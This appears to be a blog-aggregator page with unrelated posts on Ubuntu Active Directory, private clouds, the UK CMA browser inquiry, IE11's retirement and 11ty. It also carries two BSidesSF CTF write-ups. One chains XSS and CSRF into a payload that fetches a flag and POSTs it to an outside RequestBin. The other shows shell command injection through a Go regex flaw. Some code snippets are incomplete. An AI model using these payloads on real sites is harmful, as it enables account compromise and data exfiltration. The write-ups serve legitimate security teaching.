June 17, 2022

Linux Active Directory (AD) integration is historically one of the most requested functionalities by our corporate users, and with Ubuntu Desktop 22.04, we introduced ADsys, our new Active Directory client. This blog post is part 3 of a series where we will explore the new functionalities in more detail. (Part 1  – Introduction, Part 2 – Group Policy Objects)

The latest Verizon Data Breach report highlighted that leaked credential and phishing combined account for over 70% of the causes of cyberattacks. User management therefore plays a critical role in reducing your organisation attack surface. In this article we will focus on how Active Directory can be used to control and limit the privileges your users have on on their Ubuntu machines.

While there are significant differences between how Windows and Linux systems perform user management, with ADsys we tried to keep the IT administrators’ user experience as similar as possible to the one currently available for Windows machines.

User management on Linux

Before discussing the new ADsys features it is important to understand the types of users available in Ubuntu and how privileges are managed in the operating system.

There are three types of users in Ubuntu:

  • SuperUser or Root User: the administrator of the Linux system who has elevated rights. The root user doesn’t need permission to run any command. In Ubuntu the root user is available but disabled by default. 
  • System User: the users created by installed software or applications. For example when we install Apache Kafka in the system, it will create the user account named “Apache” to perform application specific tasks.
  • Normal User: the accounts which are used by the users and have a limited set of permissions.

Normal users can use sudo to run programs with the administrative privileges which are normally reserved to the root user.

In order to guarantee the right balance between developer productivity and security it is important for IT administrators to have a centrally defined set of users who are able to execute privileges commands on a machine. A crucial step for this, and the primary driver behind the new feature, was the ability to remove local administrators and enable administrative rights based on Active Directory group membership.

Managing Ubuntu users with Active Directory

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/e6OOTpKaeUv1ROuw3muFOqjb99Ls4vAcLV63RWClnybecmy9sTqeQj6MFSJvGaJzaiNOcJZP-R4oF3X0qa0zIjeEbrGkegyOn-qNUAEM_FubC8Lda_iQJAeqER8sG05diZgaQw40rLK1nCy0KA" width="720" /> </noscript>
Active Directory Admin Center

As discussed in part 2 of this blog series you need to import in Active Directory the administrative templates generated by the ADsys command line or available on the project GitHub repository. Once done, the privilege management settings are globally enforced machine policies that are available at Computer Configuration > Policies > Administrative Templates > Ubuntu > Client management > Privilege Authorization in your Active Directory Admin Center.

By default members of the local sudo group are administrators on the machine. If the ocal User setting is set to  Disabled the sudo group members are not considered administrators on the client. This means that only valid Active Directory users are able to log in to the machine.

Similarly it is possible to grant administrator privileges to specific Active Directory users and groups, or a combination of both. Using groups is an essential feature to allow you to securely manage administrators across machines, as privileged access reviews will be reduced to reviewing membership to a single or a few Active Directory groups. 

Additional resources and how to get the new features

The features described in this blog post are available for free for all Ubuntu users, however you need an Ubuntu Advantage subscription to take advantage of the privilege management and remote scripts execution features. You can get a personal license free of charge using your Ubuntu SSO account. ADSys is supported on Ubuntu starting from 20.04.2 LTS, and tested with Windows Server 2019.

We have recently updated the Active Directory integration whitepaper to include a practical step by step guide to help you take you full advantage of the new features. If you want to know more about the inner workings of ADsys you can head to its Github page or read the product documentation.

If you want to learn more about Ubuntu Desktop, Ubuntu Advantage or our advanced Active Directory integration features please do not hesitate to contact us to discuss your needs with one of our advisors.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh4.googleusercontent.com/ztFARZsi4jL7tbwOJWSV7Oqidx_4-MXs3sMmS3BexncdzTcnREIBmmEy51AlZY6HuswdE0jEElaWtk1EalrCXZODCJpQPmAwp8nnZw1OdZtjBIOhu_gH9DJy5wwH39KL8oXy1x8gJHVJnqcJMw" width="720" /> </noscript>
on June 17, 2022 07:43 PM

Even after the public cloud hype, private clouds remain to be a very essential part of many enterprises’ cloud strategy. Private clouds are simply giving CIOs more control over their budgets, enabling better security and allowing the flexibility to build best of breed IT solutions. So let’s stop here and take a step backwards, why are organisations even investing in their IT?

Why are private clouds complicated?

IT is an investment, like any other investment an organisation makes. Think of it financially, nobody will decide to invest because they think it will be cool! There is a financial return at the end of any road that makes the story reasonable. This might be:

  • Cutting down current costs, saving money.
  • Securing the data and applications, building reputation and saving money
  • Improving productivity, helping organisations make more money.
  • Better serving their customers, making more money.
  • Enabling the launching of a new product or service, making more money.
  • Cutting down the time-to-market, making more money faster.

It usually falls under one of these areas or their derivatives, and it’s all about the ROI. The promise of the cloud transformation was to contribute to most of these areas, if not all. Simply by cutting down infrastructure and operational costs and providing a rapid time-to-market for organisations to get their workloads live.

However, this was not the case for many who pursued the cloud, whether it was the private or public cloud. Running your IT on the long term and at scale is expensive on the public cloud. Yet, the day-2 operations of the private cloud creates unavoidable friction. Adding up to this, there are many approaches to building and setting up your cloud. Should it be a bare-metal cloud, a Kubernetes or a virtualized cloud? Should you run it in the public cloud, on-premises or in a co-located facility? Which technologies or vendor products should you use in every layer of your stack? There are literally endless possibilities of how you can create a best of breed cloud. So, how can we build a successful cloud transformation strategy? 

How has the public cloud changed the game? 

As the public cloud emerged, organisations started migrating their workloads to the public cloud to reduce their TCO. Public cloud service providers have created an alternative pathway for organisations to offload the hassle of managing underlying infrastructure, and allowing them to focus more on their applications. Due to simplicity, fractional consumption and pay-as-you-consume pricing model, the public cloud also enabled the birth of many startups and small businesses and allowed them to compete with larger organisations. It has created space for innovation with minimum constraints. Before the public cloud, a business would have to build a data centre to host their services, costing them hundreds of thousands of dollars just for their IT. That was a massive overhead and a high risk for many in their very early stages. With the development of the public cloud, we have seen many startups were empowered to compete with global enterprises, disrupting many industries and impacting our everyday lives. So let’s take a closer look at what public cloud providers offer compared to private clouds.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://ubuntu.com/wp-content/uploads/92ab/Iaas-Paas-SaaS-table.png" width="720" /> </noscript>

In an on-premise environment, the organisation is responsible for the whole stack, starting with networking, storage and servers moving all the way to the application layer. In the public cloud, if your organisation uses IaaS, you take care of the OS and above. All the underlying infrastructure are basically dependencies that the cloud provider will manage for you. If you’re using a PaaS, they will also take care of the OS, middleware and runtime of your environment. With SaaS, you’re basically an end user of an application where the cloud provider manages everything for you.

This is something that you all probably know, but I want to dig deeper into what falls under whom’s responsibility. In cases where you wish your organisation has the most control over the cloud, virtualisation, servers, storage and networking are still managed by your cloud provider. This tells us that infrastructure has been commoditized by hyperscalers, and managing them does not uniquely provide your business with a competitive edge that impacts your organisation. Offloading these services will help you focus more on your strategic layers and become more innovative.

Moving towards a data centre as a service

The rule of thumb is: today’s technology becomes tomorrow’s commodity. Accordingly, the less unique your building blocks are, the easier it is to operate and evolve them in the future. Take PCs, for example, there is nothing unique about them today. Any piece of hardware will have a layer of OS on top that will dictate how this hardware should function, and anyone with basic computer skills should be able to use them. Data centres should be designed in the exact same way, in fact, this is how they evolved with time. In the last several years, we can see how most data centre and cloud solution vendors are commoditising their hardware and focusing on software to create the layer of intelligence that differentiates their solutions.

In short, managing the dependencies of your business applications does not add value to your organisation nor does it enrich your competitive edge in the market. However, digitising your operations, enabling remote work or heavily focusing on R&D can contribute to your competitive advantage. Frankly, 96% of executives are unhappy about innovation according to a recent McKinsey report. The findings are not surprising given that most IT specialists are more focused on keeping the lights on. This has become one of the main drivers why many organisations are moving towards managed private clouds. They want to cut down operational costs and gain more control over their budgets to be able to shift focus towards innovation. Keeping in mind that the ultimate goal behind open source is to enable flexibility and agility and cut down costs, avoiding its complexity is a huge gain for the organisation.

Thinking about simplifying your operations? 

Download the guide “Managed IT Services: Overcoming CIOs biggest challenges”
Read the “Private cloud vs managed cloud: cost analysis” whitepaper
Visit our managed services website to learn more

on June 17, 2022 01:47 PM

Help the CMA help the Web

Stuart Langridge

As has been mentioned here before the UK regulator, the Competition and Markets Authority, are conducting an investigation into mobile phone software ecosystems, and they recently published the results of that investigation in the mobile ecosystems market study. They’re also focusing in on two particular areas of concern: competition among mobile browsers, and in cloud gaming services. This is from their consultation document:

Mobile browsers are a key gateway for users and online content providers to access and distribute content and services over the internet. Both Apple and Google have very high shares of supply in mobile browsers, and their positions in mobile browser engines are even stronger. Our market study found the competitive constraints faced by Apple and Google from other mobile browsers and browser engines, as well as from desktop browsers and native apps, to be weak, and that there are significant barriers to competition. One of the key barriers to competition in mobile browser engines appears to be Apple’s requirement that other browsers on its iOS operating system use Apple’s WebKit browser engine. In addition, web compatibility limits browser engine competition on devices that use the Android operating system (where Google allows browser engine choice). These barriers also constitute a barrier to competition in mobile browsers, as they limit the extent of differentiation between browsers (given the importance of browser engines to browser functionality).

They go on to suggest things they could potentially do about it:

A non-exhaustive list of potential remedies that a market investigation could consider includes:
  • removing Apple’s restrictions on competing browser engines on iOS devices;
  • mandating access to certain functionality for browsers (including supporting web apps);
  • requiring Apple and Google to provide equal access to functionality through APIs for rival browsers;
  • requirements that make it more straightforward for users to change the default browser within their device settings;
  • choice screens to overcome the distortive effects of pre-installation; and
  • requiring Apple to remove its App Store restrictions on cloud gaming services.

But, importantly, they want to know what you think. I’ve now been part of direct and detailed discussions with the CMA a couple of times as part of OWA, and I’m pretty impressed with them as a group; they’re engaged and interested in the issues here, and knowledgeable. We’re not having to educate them in what the web is. The UK’s potential digital future is not all good (and some of the UK’s digital future looks like it could be rather bad indeed!) but the CMA’s work is a bright spot, and it’s important that we support the smart people in tech government, lest we get the other sort.

So, please, take a little time to write down what you think about all this. The CMA are governmental: they have plenty of access to windy bloviations about the philosophy of tech, or speculation about what might happen from “influencers”. What’s important, what they need, is real comments from real people actually affected by all this stuff in some way, either positively or negatively. Tell they whether you think they’ve got it right or wrong; what you think the remedies should be; which problems you’ve run into and how they affected your projects or your business. Earlier in this process we put out calls for people to send in their thoughts and many of you responded, and that was really helpful! We can do more this time, when it’s about browsers and the Web directly, I hope.

If you feel as I do then you may find OWA’s response to the CMA’s interim report to be useful reading, and also the whole OWA twitter thread on this, but the most important thing is that you send in your thoughts in your own words. Maybe what you think is that everything is great as it is! It’s still worth speaking up. It is only a good thing if the CMA have more views from actual people on this, regardless of what those views are. These actions that the CMA could take here could make a big difference to how competition on the Web proceeds, and I imagine everyone who builds for the web has thoughts on what they want to happen there. Also there will be thoughts on what the web should be from quite a few people who use the web, which is to say: everybody. And everybody should put their thoughts in.

So here’s the quick guide:

  1. You only have until July 22nd
  2. Read Mobile browsers and cloud gaming from the CMA
  3. Decide for yourself:
    • How these issues have personally affected you or your business
    • How you think changes could affect the industry and consumers
    • What interventions you think are necessary
  4. Email your response to browsersandcloud@cma.gov.uk

Go to it. You have a month. It’s a nice sunny day in the UK… why not read the report over lunchtime and then have a think?

on June 17, 2022 10:33 AM

June 15, 2022

Dev Ops job?

Bryan Quigley

Dev Ops Job?

Are you looking for a remote (US, Canada, or Phila) Dev Ops job with a company focused on making a positive impact?

on June 15, 2022 04:00 PM

But what will people download Chrome with now?

Raise a glass, kiss your wife, hug your children. It’s finally gone.

IE11 Logo

It’s dead.

Internet Explorer has been dying for an age. 15 years ago IE6 finally bit it, 8 years ago I was calling for webdevs to hasten the death of IE8 and today is the day that Microsoft has finally pulled regular support for “retired” Internet Explorer 11, last of its name.

Its successor, Edge, uses Chrome’s renderer. While I’m sure we’ll have a long chat about the problems of monocultures one day, this means —for now— we can really focus on modern standards without having to worry about what this 9 year old renderer thinks. And I mean that at a commercial, enterprise level. Use display: grid without fallback code. Use ES6 features without Babel transpiling everything. Go, create something and expect it to just work.

Here’s to never having to download the multi-gigabyte, 90 day Internet Explorer test machine images. Here’s to kicking out swathes of compat code. Here’s to being able to [fairly] rigourously test a website locally without a third party running a dozen versions of Windows.

The web is more free for this. Rejoice! while it lasts.

on June 15, 2022 12:00 AM

June 14, 2022

Welcome to the Ubuntu Weekly Newsletter, Issue 739 for the week of June 5 – 11, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on June 14, 2022 12:02 AM

June 12, 2022

This site is now powered by a static site generator called 11ty. It’s awesome! I’ll try to explain some of my favourite things about it and reasons you might prefer it to stalwarts in the SSG arena.

Volume knob that goes to 11

15 years ago, training up on Django, I built a blog. It’s what webdevs did back then. It was much faster than Wordpress but the editing always fell short and the database design got in the way more than it helped. Dogfooding your software means every problem is yours. I had a glossy coat but the jelly and chunks arrested my writing process.

SSGs are perfect for blogs and brochure websites

Static site generators churn content through templates into a static website that you can just upload to a simple webserver. This is unlike Django or any other dynamic language, where you host a running process and database on an expensive server 24/7 to generate HTML on demand. You’re just serving files, for free.

Most sites don’t need fresh fresh HTML for every request. They don’t change often enough. A blog or a business’ brochure website might get updates anywhere from a couple of times a day to only once or twice a year. With a static site generator, you can make your edits and regenerate the site.

It’s also secure. There’s nothing to hack running on my domain like there might be in a Wordpress install. There’s no database to run injection attacks against. There’s no indication where the source is hosted. For me, Cloudflare assumes much of liability there and if I’m worried

I’ve used a few SSGs professionally: Jekyll, Hugo and Nuxt.

Why pick 11ty over those?

11ty logo

Jekyll is glacial on Cloudflare’s CI/CD environment; about 3 minutes a build. Hugo is Fast but can be a nightmare to work with when things go wrong. Absolutely user-error, but I’ve wasted days at a time banging my head on Hugo. Both Jekyll and Hugo being non-JS options have their own take on asset management. I’m also a Vue developer so Nuxt is great for me, but force-feeding users a bundle of Vue, Nuxt and routers and whatnot, just for a blog? It’s silly. It does have top-shelf asset management though.

11ty was a perfect balance between Hugo and Nuxt. I get all my favourite frontend tools (PostCSS, PurgeCSS on here) with a generator that isn’t trying to force-feed my users a massive script bundle.

More, I get to pick the markup language I write in. I can use Markdown, Liquid, Handlebars, Nunjucks, Moustache, and many, many more. Even plain old HTML, or a mix. I can bundle images with the blog posts (like Hugo leaf bundles). I can paint extra styles on the page if I want to.

I have freedom. I can do anything, on any page.

It’s been 3 weeks, 2 days since my initial commit on this site’s repo and since finishing the conversion I’ve written more posts than I did in the previous decade, and I’ve also converted two Jekyll sites over too. Each took about an afternoon. Perfect URL parity, nothing ostensibly different, just a [much] better toolchain.

What took longest was editing and upgrading 285 blog posts, spanning back to the early Naughties.

Fast Enough™ for developers

Build performance only matters to a point. On this seven year old laptop, 11ty generates this whole blog, 400 pages, in well under two seconds:

Copied 403 files / Wrote 539 files in 1.46 seconds (2.7ms each, v1.0.1)

It’s a second faster on my desktop, and on a real 23 page brochure website, it’s only 0.3s.

11ty is fast but whatever I use only has to be faster than me switching to my browser. Hugo is insanely fast but so what? Anything less than 2 seconds is Fast Enough™. That’s what I mean.

No added bloat for visitors

Many Javascript-based SSGs bundle in client code too. Sometimes this makes sense: You might use Next and Nuxt to build component rich SPAs, but for blogging and brochure stuff, an extraneous 100KB of swarf delivers a poor user experience.

This may explain why I’ve actively sought out non-JS SSGs like Jekyll and Hugo before.

11ty is one of the few JS SSGs that doesn’t force script on your users. If you want “pure” HTML, that’s what you’ll get. If you’re economic with your CSS, images and fonts, it’s easy to juice the performance stats.

100% on Pagespeed

Comes with batteries…

You don’t have to pick between Markdown and Pug, Liquid or Nunjucks. You get them all, and more. Frontmatter can be in YAML, TOML, HAML, JSON even build-time javascript. So what? So what?! You wouldn’t say that if you’d ever wasted a day trying to work out what the hell a Hugo site was doing because of a typo in a template whose syntax was so thick and unwelcoming, kings built castle walls with it.

11ty is simple and flexible.

There’s also a huge pile of community 11ty plugins too.

… But you can use your own

If you don’t get on with something in 11ty, you use something else, or rip it; do your own thing.

The Eureka moment for me was when I got into a fight with the markdown engine. I wanted to extend it to handle some of the custom things I did in my old blog posts, that I’d implemented in Django. Code to generate Youtube embeds, special floats, <aside> sidebars, etc. It would have been a nightmare to upgrade every post.

Using markdown-it and markdown-it-container I completely replaced the Markdown engine with something I could hack on. Here’s a real “explainer” snippet I have and use:

It’s important to stress that neither of those projects are for 11ty. They’re just two of a million projects sitting on npm for anyone to use. 11ty just makes it easy to use any of this stuff on your pages.

Adding template-filters for all the bundled template languages is also made really simple:

eleventyConfig.addFilter("striptags", v => v.replace(/(<([^>]+)>)/gi, ""))

If you’ve ever used opinionated software before —perhaps even your own— you’ll appreciate that 11ty isn’t just getting out of your way, it’s going out of its way to make your life easy.

What’s not so good?

I’m three sites into 11ty now, I’ve seen how I work with it and I’ve bumped into a few things I’m not gushing about:

  • Pagination is good and frustrating in equal measure. Collections seem like a good idea, filtering them into new collections is easy enough, but actually paginating them can be a bit of a mess. To show a tag page, for example, you actually use pagination to filter the collection to that tag. But then you can’t [easily] re-paginate that data, so I just show all posts from that tag rather than 15.

    If I had hundreds of posts in any one tag, this’d be a problem.

  • For all my complaints with Jekyll and Hugo’s wonky asset pipelines, 11ty’s is completely decoupled.

    I use eleventy-plugin-postcss to call PostCSS at roughly the right time (and update on changes) but I could just as easily handle that externally. There’s nothing in 11ty (obvious to me anyway) to ingest that back into the templates.

    • You can’t easily inline classes that only get used on one page.
    • You can’t easily hash the filenames and update the links that call them after generating the post HTML (that’s important with PurgeCSS).
    • Media handling could be tighter. The Image plugin is official, but this should be part of the project IMO, and not rely on this hairy shortcode.

    It’s important to stress that I’m using 11ty in order that I don’t need bundles, but some of these complaints would be assuaged if the system could parse bundle manifests, so I could use external tools rather than just a dumb static assets and have the right filenames pulled in (at the right time).

  • A scoped include like Django’s would solve a couple of problems I’ve hacked around:

    {% include 'template' with variable=value %}

    Saneef points out that this is possible by leveraging the macro functions in Nunjucks. It’s a bit of a mouthful. I’d prefer a first-party solution (which I guess would actually have to come as part of the Nunjucks), but again it’s interesting to see just how flexible this thing is.

  • Named/keyword arguments in shortcodes would also be nice, so I don’t have to provide every option to just use the last, but I guess this would require some thinking to overcome the lack of support for destructured parameters in ES6.

These are small complaints, maybe already with solutions I’ve just not seen yet.

I’ve still managed to transfer three sites to 11ty in a couple of weeks and I wouldn’t have done that if I didn’t think it worked well enough. I’m really happy with 11ty. I’d heartily recommend it to anyone.

on June 12, 2022 12:00 AM

June 09, 2022

This year, I was the author of a few of our web challenges. One of those that gave both us (as administrators) and the players a few difficulties was “TODO List”.

Upon visiting the application, we see an app with a few options, including registering, login, and support. Upon registering, we are presented with an opportunity to add TODOs and mark them as finished:


If we check robots.txt we discover a couple of interesting entries:

User-agent: *
Disallow: /index.py
Disallow: /flag

Visiting /flag, unsurprisingly, shows us an “Access Denied” error and nothing further. It seems that we’ll need to find some way to elevate our privileges or compromise a privileged user.

The other entry, /index.py, provides the source code of the TODO List app. A few interesting routes jump out at us, not least of which is the routing for /flag:

@app.route('/flag', methods=['GET'])
def flag():
    user = User.get_current()
    if not (user and user.is_admin):
        return 'Access Denied', 403
    return flask.send_file(
            'flag.txt', mimetype='text/plain', as_attachment=True)

We see that we will need a user flagged with is_admin. There’s no obvious way to set this value on an account. User IDs as stored in the database are based on a sha256 hash, and the passwords are hashed with argon2. There’s no obvious way to login as an administrator here. There’s an endpoint labeled /api/sso, but it requires an existing session.

Looking at the frontend of the application, we see a pretty simple Javascript to load TODOs from the API, add them to the UI, and handle marking them as finished on click. Most of it looks pretty reasonable, but there’s a case where the TODO is inserted into an HTML string here:

const rowData = `<td><input type='checkbox'></td><td>${data[k].text}</td>`;
const row = document.createElement('tr');
row.innerHTML = rowData;

This looks awfully like an XSS sink, unless the server is pre-escaping the data for us in the API. Easy enough to test though, we can just add a TODO containing <span onclick='alert(1)'>Foobar</span>. We quickly see the span become part of the DOM and a click on it gets the alert we’re looking for.


At this point, we’re only able to get an XSS on ourselves, otherwise known as a “Self-XSS”. This isn’t very exciting by itself – running a script as ourselves is not crossing any privilege boundaries. Maybe we can find a way to create a TODO for another user?

@app.route('/api/todos', methods=['POST'])
def api_todos_post():
    user = User.get_current()
    if not user:
        return '{}'
    todo = flask.request.form.get("todo")
    if not todo:
        return 'Missing TODO', 400
    num = user.add_todo(todo)
    if num:
        return {'{}'.format(num): todo}
    return 'Too many TODOs', 428

Looking at the code for creating a TODO, it seems quite clear that it depends on the current user. The TODOs are stored in Redis as a single hash object per user, so there’s no apparent way to trick it into storing a TODO for someone else. It is worth noting that there’s no apparent protection against a Cross-Site Request Forgery, but it’s not clear how we could perform such an attack against the administrator.

Maybe it’s time to take a look at the Support site. If we visit it, we see not much at all but a Login page. Clicking on Login redirects us through the /api/sso endpoint we saw before, passing a token in the URL and generating a new session cookie on the support page. Unlike the main TODO app, no source code is to be found here. In fact, the only real functionality is a page to “Message Support”.

Submitting a message to support, we get a link to view our own message. In the page, we have our username, our IP, our User-Agent, and our message. Maybe we can use this for something. Placing an XSS payload in our message doesn’t seem to get anywhere in particular – nothing is firing, at least when we preview it. Obviously an IP address isn’t going to contain a payload either, but we still have the username and the User-Agent. The User-Agent is relatively easily controlled, so we can try something here. cURL is an easy way to give it a try, especially if we use the developer tools to copy our initial request for modification:

curl 'https://todolist-support-ebc7039e.challenges.bsidessf.net/message' \
  -H 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryz4kbBFNL12fwuZ57' \
  -H 'cookie: sup_session=75b212f8-c8e6-49c3-a469-cfc369632c72' \
  -H 'origin: https://todolist-support-ebc7039e.challenges.bsidessf.net' \
  -H 'referer: https://todolist-support-ebc7039e.challenges.bsidessf.net/message' \
  -H 'user-agent: <script>alert(1)</script>' \
  --data-raw $'------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="difficulty"\r\n\r\n4\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="message"\r\n\r\nfoobar\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="pow"\r\n\r\n1b4849930f5af9171a90fe689edd6d27\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57--\r\n'

Viewing this message, we see our good friend, the alert box.

Alert 1

Things are beginning to become a bit clear now – we’ve discovered a few things.

  1. The flag is likely on the page /flag of the TODO list manager.
  2. Creating a TODO list entry has no protection against XSRF.
  3. Rendering a TODO is vulnerable to a self-XSS.
  4. Messaging the admin via support appears to be vulnerable to XSS in the User-Agent.

Due to the Same-Origin Policy, the XSS on the support site can’t directly read the resources from the main TODO list page, so we need to do a bit more here.

We can chain these together to (hopefully) retrieve the flag as the admin by sending a message to the admin that contains a User-Agent with an XSS payload that does the following steps:

  1. Uses the XSRF to inject a payload (steps 3+) as a new XSS.
  2. Redirects the admin to their TODO list to trigger the XSS payload.
  3. Uses the Fetch API (or XHR) to retrieve the flag from /flag.
  4. Uses the Fetch API (or XHR) to send the flag off to an endpoint we control.

One additional complication is that <script> tags will not be executed if injected via the innerHTML mechanism in the TODO list. The reasons are complicated, but essentially:

  • innerHTML is parsed using the algorithm descripted in Parsing HTML Fragments of the HTML spec.
  • This creates an HTML parser associated with a new Document node.
  • The script node is parsed by this parser, and then inserted into the DOM of the parent Document.
  • Consequently, the parser document and the element document are different, preventing execution.

We can work around this by using an event handler that will fire asynchronously. My favorite variant of this is doing something like <img src='x' onerror='alert(1)'>.

I began by preparing the payload I wanted to fire on todolist-support as an HTML standalone document. I included a couple of variables for the hostnames involved.

<div id='s2'>
const dest='{{dest}}';
fetch('/flag').then(r => r.text()).then(b => fetch(dest, {method: 'POST', body: b}));
const ep='{{ep}}';
const s2=document.getElementById('s2').innerHTML;
const fd=new FormData();
fd.set('todo', '<img src="x" onerror="'+s2+'">');
    {method: 'POST', body: fd, mode: 'no-cors', credentials: 'include'}).then(
        _ => {document.location.href = ep + '/todos'});

I used the DIV s2 to get the escaping right for the Javascript I wanted to insert into the error handler for the image. This would be the payload executed on todolist, while the lower script tag would be executed on todolist-support. This wasn’t strictly necessary, but it made experimenting with the 2nd stage payload easier.

The todolist-support payload triggers a cross-origin request (hence the need for mode: 'no-cors' and credentials: 'include' to the todolist API to create a new TODO. The new TODO contained an image tag with the contents of s2 as the onerror handler (which would fire as soon as rendered).

That javascript first fetched the /flag endpoint, then did a POST to my destination with the contents of the response.

I built a small(ish) python script to send the payload file, and used RequestBin to receive the final flag.

import requests
import argparse
import os

def make_email():
    return os.urandom(12).hex() + '@example.dev'

def register_account(session, server):
    resp = session.post(server + '/register', data={
        'email': make_email(),
        'password': 'foofoo',
        'password2': 'foofoo'})

def get_support(session, server):
    resp = session.get(server + '/support')
    return resp.url

def post_support_message(session, support_url, payload):
    # first sso
    resp = session.get(support_url + '/message')
    msg = "auto-solution-test"
    pow_value = "c8157e80ff474182f6ece337effe4962"
    data = {"message": msg, "pow": pow_value}
    resp = session.post(support_url + '/message', data=data,
            headers={'User-Agent': payload})

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('server', default='http://localhost:3123/',
            nargs='?', help='TODO Server')
    args = parser.parse_args()

    server = args.server
    if server.endswith('/'):
        server = server[:-1]
    sess = requests.Session()
    register_account(sess, server)
    support_url = get_support(sess, server)
    if support_url.endswith('/'):
        support_url = support_url[:-1]
    print('Support URL: ', support_url)
    payload = open('payload.html').read().replace('\n', ' ')
    payload = payload.replace('{{dest}}', args.requestbin
            ).replace('{{ep}}', server)
    print('Payload is: ', payload)
    post_support_message(sess, support_url, payload)
    print('Sent support message.')

if __name__ == '__main__':

The python takes care of registering an account, redirecting to the support site, logging in there, then sending the payload in the User-Agent header. Checking the request bin will (after a handful of seconds) show us the flag.

on June 09, 2022 07:00 AM

June 07, 2022

Hello world!

Salih Emin

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

on June 07, 2022 09:00 AM

As the author of the Cow Say What? challenge from this year’s BSidesSF CTF, I got a lot of questions about it after the CTF ended. It’s both surprisingly straight-forward but also a very little-known issue.

The challenge was a web challenge – if you visited the service, you got a page providing a textarea for input to the cowsay program, as well as a drop down for the style of the cow saying something (plain, stoned, dead, etc.). There was a link to the source code, reproduced here:

package main

import (

const (
	COWSAY_PATH = "/usr/games/cowsay"

var (
	modeRE = regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")

// Note: mode must be validated prior to running this!
func cowsay(mode, message string) (string, error) {
	cowcmd := fmt.Sprintf("%s %s -n", COWSAY_PATH, mode)
	log.Printf("Running cowsay as: %s", cowcmd)
	cmd := exec.Command("/bin/sh", "-c", cowcmd)
	stdin, err := cmd.StdinPipe()
	if err != nil {
		return "", err
	go func() {
		defer stdin.Close()
		io.WriteString(stdin, message)
	outbuf, err := cmd.Output()
	if err != nil {
		return "", err
	return string(outbuf), nil

func checkMode(mode string) error {
	if mode == "" {
		return nil
	if !modeRE.MatchString(mode) {
		return fmt.Errorf("Mode must match regexp: %s", modeRE.String())
	return nil

const cowTemplateSource = `
<!doctype html>
	<h1>Cow Say What?</h1>
	<p>I love <a href='https://www.mankier.com/1/cowsay'>cowsay</a> so much that
	I wanted to bring it to the web.  Enjoy!</p>
	{{if .Error}}
	<form method="POST" action="/">
	<select name="mode">
		<option value="">Plain</option>
		<option value="-b">Borg</option>
		<option value="-d">Dead</option>
		<option value="-g">Greedy</option>
		<option value="-p">Paranoid</option>
		<option value="-s">Stoned</option>
		<option value="-t">Tired</option>
		<option value="-w">Wired</option>
	</select><br />
	<textarea name="message" placeholder="message" cols="60" rows="10">{{.Message}}</textarea><br />
	<input type='submit' value='Say'><br />
	{{if .CowSay}}
	<p>Check out <a href='/cowsay.go'>how it works</a>.</p>

var cowTemplate = template.Must(template.New("cowsay").Parse(cowTemplateSource))

type tmplVars struct {
	Error   string
	CowSay  string
	Message string

func cowsayHandler(w http.ResponseWriter, r *http.Request) {
	vars := tmplVars{}
	if r.Method == http.MethodPost {
		mode := r.FormValue("mode")
		message := r.FormValue("message")
		vars.Message = message
		if err := checkMode(mode); err != nil {
			vars.Error = err.Error()
		} else {
			if said, err := cowsay(mode, message); err != nil {
				log.Printf("Error running cowsay: %v", err)
				vars.Error = "An error occurred running cowsay."
			} else {
				vars.CowSay = said
	cowTemplate.Execute(w, vars)

func sourceHandler(w http.ResponseWriter, r *http.Request) {
	http.ServeFile(w, r, "cowsay.go")

func main() {
	addr := ""
	if len(os.Args) > 1 {
		addr = os.Args[1]
	http.HandleFunc("/cowsay.go", sourceHandler)
	http.HandleFunc("/", cowsayHandler)
	log.Fatal(http.ListenAndServe(addr, nil))

There’s a few things to unpack here, but probably most significant is that the cowsay output is produced by invoking an external program. Notably, it passes the message via stdin, and the mode as an argument to the program. The entire program is invoked via sh -c, which makes this similar to the system(3) libc function.

The mode is validated via a regular expression. As Jamie Zawinski was opined (and Jeff Atwood has commented on):

Some people, when confronted with a problem, think “I know, I’ll use regular expressions.” Now they have two problems.

Well, it turns out we do have two problems. Our regular expression is given by the statement:

modeRE = regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")

We can use a tool like regex101.com to play around with our expression. Specifically, it appears that it should consist of a - followed by one of the characters separated by pipes within the parentheses. At first, this appears pretty limiting, however, if we examine the Go regexp documentation, we might notice a few oddities. Specifically, ^ is defined as “at beginning of text or line (flag m=true)” and $ as “at end of text … or line (flag m=true)”. So apparently two of our special characters have different meanings depending on some “flags”.

There are no flags in our regular expression, so we’re using whatever the defaults are. Looking at the documentation for Flags, we see that there are two default sets of flags: Perl and POSIX. Slightly strangely, the constants use an inverted meaning for the m flag: OneLine, which causes the regular expression engine to “treat ^ and $ as only matching at beginning and end of text”. This flag is not included in POSIX (in fact, no flags are), so in a POSIX RE, ^ and $ match the beginning and end of lines respectively.

Our test for the Regexp to match is MatchString, which is documented as:

MatchString reports whether the string s contains any match of the regular expression re.

Note that the test is “contains any match”. If ^ and $ matched beginning and end of input, that would require the entire string to match, but since they are matching beginning and end of line, so long as the input contains a line matching the regular expression, then MatchString will return true.

This now means we can pass arbitrary input via the mode parameter, which will be directly interpolated into the string passed to sh -c. Put another way, we now have a Command Injection vulnerability. We just need to also include a line that matches our regular expression.

